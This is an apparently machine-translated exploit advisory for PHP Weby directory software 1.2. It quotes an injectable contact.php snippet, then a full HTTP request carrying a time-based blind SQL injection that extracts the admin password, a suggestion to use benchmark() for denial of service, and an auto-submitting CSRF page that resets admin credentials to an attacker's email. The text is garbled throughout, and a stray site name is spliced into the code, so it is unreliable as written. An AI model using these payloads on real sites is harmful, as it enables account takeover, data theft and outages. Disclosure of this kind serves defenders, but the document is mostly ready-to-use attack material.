PHP Weby Directory Software 1.2 Multiple defects and repair

Affected program: PHP Weby directory software version 1.2
Developer: http://phpweby.com
: Ht * p: // phpweby.com/down/phpwebydirectory.zip
Defect category: Blind SQL injection & CSRF
Program introduction:
 
Php Weby directory script is a powerful and easy-to-use FREE link management
Script with numerous options for running a directory, catalog of sites or a simple
Link exchange system. Create a general directory and have users submit their
Favorite sites and charge if you want for the review.
Or create regional directory for your town or state and your advertising,
Or niche directory about a topic you love or know.

========================================================== ===
Test System: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0 + squeeze1
PHP 5.3.3-7 + squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
With Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
========================================================== ===
 
Sample Code for defects:
 
// Contact. php
================ Snip begins ==========================
If ($ capt)
{
Unset ($ capt );
If ($ _ POST ['fullname'] = ''| $ _ POST ['subobject'] ='' | $ _ POST ['message'] = ''| $ _ POST ['mail'] = '')
$ Smarty-> assign ('error', 'Please complete the form! ');
Else
{Www.2cto.com
$ C = $ db-> Execute ("insert into contacts (fullname, subject, message, mail, ip, timehour) values ('". $ _ POST ['fullname']. "','". $ _ POST ['subobject']. "','". $ _ POST ['message']. "','". $ _ POST ['mail']. "','". $ _ SERVER ['remote _ ADDR ']. "','". date ('R '). "')");
If ($ c = false)
$ Smarty-> assign ('error', 'unknown error occured .');
Else
$ Smarty-> assign ('added', 1 );
 
=========== Snip ends here ============================
 
 
=================================
METHOD: $ _ POST
URL: http://www.2cto.com/contact. php
 
Headers:
 
Host: hacker1.own
User-Agent: UiUiUiUiUi Ping And UiUiUiUiUi And Pong :((
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-US, en; q = 0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 245
 
 
Req body:
 
Fullname = Ping And Pong Is Interesting Game xD % 5C & mail = sssssssssssssssssssss & subject =, (select case (select mid ('pass', 1, 1) from admin_area limit 1 offset 0) when 0x32 then sleep (10) else 0 end), 1, 2, 3, 4) -- and 5! = ('Advertising + Inquiry & message = TEST
 
 
============================== EOF ===========================
 
Here is how it looks:
(I prefer timebased way because simply extracting and then inserting hash to table is not usefull anymore. Only admin can see it from admin panel ).
 
IMAGE 1: http://s017.radikal.ru/i420/1301/c6/11128cbea352.png
Copy image: http://oi47.tinypic.com/2ptp79g.jpg
 
 
Also this type of SQL injections (INSERT/UPDATE) is usefull to create Denial of Service conditions against target site/server.
If so simply benchmark () is your best friend.
 
 
The second defect is: CSRF
 
Simple exploit to change admin username/password/email:
Login/password will be change to pwned and email to: admin@toattacker.tld
 
<Body onload = "javascript: document. forms [0]. submit ()">
<Form action = "http: // www.2cto.com/phpweb/admin/options. php? R = admin "method =" post ">
<Input type = "text" name = "ADMIN_NAME" value = "admin"/>
<Input type = "text" name = "ADMIN_MAIL" value = "admin@toattacker.tld"/>
<Input type = "text" name = "usr" value = "pwned"/>
<Input type = "password" name = "pass1" value = "pwned"/>
<Input type = "password" name = "pass2" value = "pwned"/>
<Input type = "hidden" name = "oldusr" value = "admin"/>
<Input type = "submit" value = "Save" class = "ss"/>
</Form>